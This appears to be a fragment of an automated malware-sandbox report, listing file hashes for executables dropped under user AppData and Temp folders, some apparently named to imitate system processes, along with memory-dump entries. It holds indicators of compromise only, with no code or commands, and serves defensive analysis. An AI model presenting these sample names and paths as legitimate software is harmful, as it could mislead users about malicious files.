| SHA256 | c3f5013436c2ff0f41dd68391ad243e3cb376fde386f2b73ca1cc2d3d11a9026 |
| SHA512 | cb4f2411462e9b39a1902abe70d866f6b41916448ff91b3ad553a2534916f2fd22efbf5992795986314a27b51383117f29783f9e623d83d73832a82f2e254e5a |
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | 19798d808798340e03649c9543412ae7 |
| SHA1 | e6196ccfd4db48ca82b4d74ab2013513f59ac610 |
| SHA256 | b8c8dbe499eeea2a2919cdedc3edfd30371363875d91832598abfade68d63c36 |
| SHA512 | e1f89b56eea160f883f84239521078db88f5e73d0e76717985fa31ed519474a5cd264e5c2322e1da02b5130457490bfc3a4757569c7f7e9f0dc6d7f0381e2b6d |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | c637c8d000e3e666d38f6270b8c7409d |
| SHA1 | 37f52d05ecf8f03cfa31e7bf6b822ce57e0644aa |
| SHA256 | fb6956f3a7ad50837ccfa07783f35a93e1d172769db981fd7e8e0899f6940320 |
| SHA512 | 9091a745404197600d272f3ac3d934905857fe7e7e1d25f25563e5b6fea23c1b67341a7c0f9c69fa67c2e696e7ee15adac571029207cf65b52cc8da88380cb04 |
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | c3e5173973852eaa2a61ac4cb6b44ee7 |
| SHA1 | ebd3032065022d2e895a0bf3cf698d5b4dc27ca1 |
| SHA256 | e3346152388318a7a6e61a8593b293cec79798ad74f2f340fd14861aae89cf39 |
| SHA512 | 44f4cfe2be5dc6f2dfcbfd507b48b5dc30bcea15e8cc1e8aa95f50d165cf03aa0de86471cff0edc05d7c9fdcb577f596b2fce78ce0b96f521d24e789116961c1 |
memory/1280-267-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | 1c3edd75bbb85f58f247d06eeeb78937 |
| SHA1 | 1627b8e3e55d75d8128ef908496f68e0a33ae574 |
| SHA256 | 5bfa9ea2ab1604b8246b753822f137f40549f9517e453f0c355612df1fdc070a |
| SHA512 | 4477cf73f7840e711abfc3111dd50e24216c1f52262742be1b2078357a4f89b53c9be416d48f79ca4907f4c867ce4c4fff22b73cd9c34649f377992b28329a16 |
memory/1556-273-0x0000000000970000-0x00000000009BC000-memory.dmp
memory/1556-272-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | 1df9907acee1e256bff862f4bbdf2605 |
| SHA1 | d8d497115f9830def8c20c1537b00dfb045c38b5 |
| SHA256 | 7f57668a1b42736a9bc3644f5057cf68ac53c3cbd974a5c868c503922d4656db |
| SHA512 | 008d09830fa5bf0dcc0cb784b9b8186d0f19d9b3448fb9f09ef3162f46271cafd16e95d30af86fa1bbf12f5f94582fe847abd3cb9730fe9b26bca4d66f015380 |
memory/4644-264-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp
memory/5036-259-0x0000000000000000-mapping.dmp
memory/4904-258-0x0000000000000000-mapping.dmp
memory/1280-286-0x000000006EB30000-0x000000006F0E1000-memory.dmp
memory/3968-287-0x0000000000000000-mapping.dmp
memory/4052-289-0x0000000000000000-mapping.dmp
memory/4772-288-0x0000000000000000-mapping.dmp
memory/2800-290-0x0000000000000000-mapping.dmp
memory/2800-296-0x000000006EB30000-0x000000006F0E1000-memory.dmp